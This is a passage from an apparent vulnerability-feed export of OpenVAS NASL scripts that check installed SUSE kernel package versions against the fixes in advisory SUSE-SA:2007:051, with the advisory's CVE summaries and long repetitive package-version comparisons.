rpm:\"kernel-bigsmp~2.6.5~7.287.3\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.5~7.287.3\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-um\", rpm:\"kernel-um~2.6.5~7.287.3\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"um-host-install-initrd\", rpm:\"um-host-install-initrd~1.0~48.24.1\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"um-host-kernel\", rpm:\"um-host-kernel~2.6.5~7.287.3\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"LES10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-debuginfo\", rpm:\"kernel-source-debuginfo~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-bigsmp-debuginfo\", rpm:\"kernel-bigsmp-debuginfo~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenpae-debuginfo\", rpm:\"kernel-xenpae-debuginfo~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.16.53~0.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLDk9\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.5~7.287.3\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.5~7.287.3\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.5~7.287.3\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.5~7.287.3\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.5~7.287.3\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.5~7.287.3\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-um\", rpm:\"kernel-um~2.6.5~7.287.3\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"um-host-install-initrd\", rpm:\"um-host-install-initrd~1.0~48.24.1\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"um-host-kernel\", rpm:\"um-host-kernel~2.6.5~7.287.3\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLESDk10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.16.53~0.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.16.53~0.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.16.53~0.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.16.53~0.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~2.6.16.53~0.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.16.53~0.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-debuginfo\", rpm:\"kernel-source-debuginfo~2.6.16.53~0.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.16.53~0.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.16.53~0.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.16.53~0.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.16.53~0.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.16.53~0.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SL10.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.16.53~0.16\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.16.53~0.16\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.16.53~0.16\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.16.53~0.16\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.16.53~0.16\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.16.53~0.16\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.16.53~0.16\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-um\", rpm:\"kernel-um~2.6.16.53~0.16\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.16.53~0.16\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.16.53~0.16\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kexec-tools\", rpm:\"kexec-tools~1.101~32.42\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mkinitrd\", rpm:\"mkinitrd~1.2~106.59\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"multipath-tools\", rpm:\"multipath-tools~0.4.6~25.22\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"open-iscsi\", rpm:\"open-iscsi~2.0.707~0.27\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"udev-085\", rpm:\"udev-085~30.40\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLPOS9\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-update-tool\", rpm:\"kernel-update-tool~0.9~20.10.4\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.5~7.287.3\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.5~7.287.3\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.5~7.287.3\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.5~7.287.3\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.5~7.287.3\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.5~7.287.3\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-um\", rpm:\"kernel-um~2.6.5~7.287.3\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"um-host-install-initrd\", rpm:\"um-host-install-initrd~1.0~48.24.1\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"um-host-kernel\", rpm:\"um-host-kernel~2.6.5~7.287.3\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"km_nss\", rpm:\"km_nss~4.9.2226~0.1\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-12T11:21:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2876", "CVE-2007-3848", "CVE-2007-3107", "CVE-2007-3851", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-2242", "CVE-2007-2453", "CVE-2007-2525"], "description": "Check for the Version of kernel", "modified": "2017-12-08T00:00:00", "published": "2009-01-28T00:00:00", "id": "OPENVAS:850094", "href": "http://plugins.openvas.org/nasl.php?oid=850094", "type": "openvas", "title": "SuSE Update for kernel SUSE-SA:2007:051", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2007_051.nasl 8050 2017-12-08 09:34:29Z santu $\n#\n# SuSE Update for kernel SUSE-SA:2007:051\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Linux kernel in SLE 10 and SUSE Linux 10.1 was updated to fix\n various security issues and lots of bugs spotted after the Service\n Pack 1 release.\n\n This again aligns the SUSE Linux 10.1 kernel with the SLE 10 release\n and for 10.1 contains kABI incompatible changes, requiring updated\n kernel module packages. Our KMPs shipped with SUSE Linux 10.1 were\n released at the same time, the NVIDIA, ATI and madwifi module owners\n have been advised to update their repositories too.\n\n Following security issues were fixed:\n - CVE-2007-2242: The IPv6 protocol allows remote attackers to cause\n a denial of service via crafted IPv6 type 0 route headers (IPV6_RTHDR_TYPE_0)\n that create network amplification between two routers.\n\n The default is that RH0 is disabled now. To adjust this, write to\n the file /proc/net/accept_source_route6.\n\n - CVE-2007-2453: The random number feature in the Linux kernel 2.6 (1)\n did not properly seed pools when there is no entropy, or (2) used\n an incorrect cast when extracting entropy, which might have caused\n the random number generator to provide the same values after reboots\n on systems without an entropy source.\n\n - CVE-2007-2876: A NULL pointer dereference in SCTP connection tracking\n could be caused by a remote attacker by sending specially crafted\n packets.\n Note that this requires SCTP set-up and active to be exploitable.\n\n - CVE-2007-3105: Stack-based buffer overflow in the random number\n generator (RNG) implementation in the Linux kernel before 2.6.22\n might allow local root users to cause a denial of service or gain\n privileges by setting the default wake-up threshold to a value\n greater than the output pool size, which triggers writing random\n numbers to the stack by the pool transfer function involving "bound\n check ordering".\n\n Since this value can only be changed by a root user, exploitability\n is low.\n\n - CVE-2007-3107: The signal handling in the Linux kernel, when run on\n PowerPC systems using HTX, allows local users to cause a denial of\n service via unspecified vectors involving floating point corruption\n and concurrency.\n\n - CVE-2007-2525: Memory leak in the PPP over Ethernet (PPPoE) socket\n implementation in the Linux kernel allowed local users to cause\n a denial of service ( ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_impact = \"remote denial of service\";\ntag_affected = \"kernel on SUSE LINUX 10.1, SUSE Linux Enterprise Desktop 10 SP1, SLE SDK 10 SP1, SUSE Linux Enterprise Server 10 SP1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850094);\n script_version(\"$Revision: 8050 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 10:34:29 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-28 13:40:10 +0100 (Wed, 28 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2007-051\");\n script_cve_id(\"CVE-2007-2242\", \"CVE-2007-2453\", \"CVE-2007-2525\", \"CVE-2007-2876\", \"CVE-2007-3105\", \"CVE-2007-3107\", \"CVE-2007-3513\", \"CVE-2007-3848\", \"CVE-2007-3851\");\n script_name( \"SuSE Update for kernel SUSE-SA:2007:051\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"SLESDk10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.16.53~0.8\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.16.53~0.8\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.16.53~0.8\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.16.53~0.8\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.16.53~0.8\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.16.53~0.8\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.16.53~0.8\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SL10.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"cloop-kmp-bigsmp\", rpm:\"cloop-kmp-bigsmp~2.01_2.6.16.53_0.8~22.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cloop-kmp-debug\", rpm:\"cloop-kmp-debug~2.01_2.6.16.53_0.8~22.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cloop-kmp-default\", rpm:\"cloop-kmp-default~2.01_2.6.16.53_0.8~22.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cloop-kmp-smp\", rpm:\"cloop-kmp-smp~2.01_2.6.16.53_0.8~22.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cloop-kmp-xen\", rpm:\"cloop-kmp-xen~2.01_2.6.16.53_0.8~22.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cloop-kmp-xenpae\", rpm:\"cloop-kmp-xenpae~2.01_2.6.16.53_0.8~22.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drbd\", rpm:\"drbd~0.7.22~42.14\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drbd-kmp-bigsmp\", rpm:\"drbd-kmp-bigsmp~0.7.22_2.6.16.53_0.8~42.14\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drbd-kmp-debug\", rpm:\"drbd-kmp-debug~0.7.22_2.6.16.53_0.8~42.14\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drbd-kmp-default\", rpm:\"drbd-kmp-default~0.7.22_2.6.16.53_0.8~42.14\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drbd-kmp-smp\", rpm:\"drbd-kmp-smp~0.7.22_2.6.16.53_0.8~42.14\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drbd-kmp-xen\", rpm:\"drbd-kmp-xen~0.7.22_2.6.16.53_0.8~42.14\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drbd-kmp-xenpae\", rpm:\"drbd-kmp-xenpae~0.7.22_2.6.16.53_0.8~42.14\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hbedv-dazuko-kmp-bigsmp\", rpm:\"hbedv-dazuko-kmp-bigsmp~2.3.2_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hbedv-dazuko-kmp-debug\", rpm:\"hbedv-dazuko-kmp-debug~2.3.2_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hbedv-dazuko-kmp-default\", rpm:\"hbedv-dazuko-kmp-default~2.3.2_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hbedv-dazuko-kmp-smp\", rpm:\"hbedv-dazuko-kmp-smp~2.3.2_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hbedv-dazuko-kmp-xen\", rpm:\"hbedv-dazuko-kmp-xen~2.3.2_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hbedv-dazuko-kmp-xenpae\", rpm:\"hbedv-dazuko-kmp-xenpae~2.3.2_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ivtv-kmp-bigsmp\", rpm:\"ivtv-kmp-bigsmp~0.7.0_2.6.16.53_0.8~12.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ivtv-kmp-debug\", rpm:\"ivtv-kmp-debug~0.7.0_2.6.16.53_0.8~12.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ivtv-kmp-default\", rpm:\"ivtv-kmp-default~0.7.0_2.6.16.53_0.8~12.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ivtv-kmp-smp\", rpm:\"ivtv-kmp-smp~0.7.0_2.6.16.53_0.8~12.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ivtv-kmp-xen\", rpm:\"ivtv-kmp-xen~0.7.0_2.6.16.53_0.8~12.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ivtv-kmp-xenpae\", rpm:\"ivtv-kmp-xenpae~0.7.0_2.6.16.53_0.8~12.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.16.53~0.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.16.53~0.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.16.53~0.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.16.53~0.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.16.53~0.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.16.53~0.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.16.53~0.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-um\", rpm:\"kernel-um~2.6.16.53~0.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.16.53~0.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.16.53~0.8\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kexec-tools\", rpm:\"kexec-tools~1.101~32.42\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lirc-kmp-bigsmp\", rpm:\"lirc-kmp-bigsmp~0.8.0_2.6.16.53_0.8~0.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lirc-kmp-default\", rpm:\"lirc-kmp-default~0.8.0_2.6.16.53_0.8~0.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lirc-kmp-smp\", 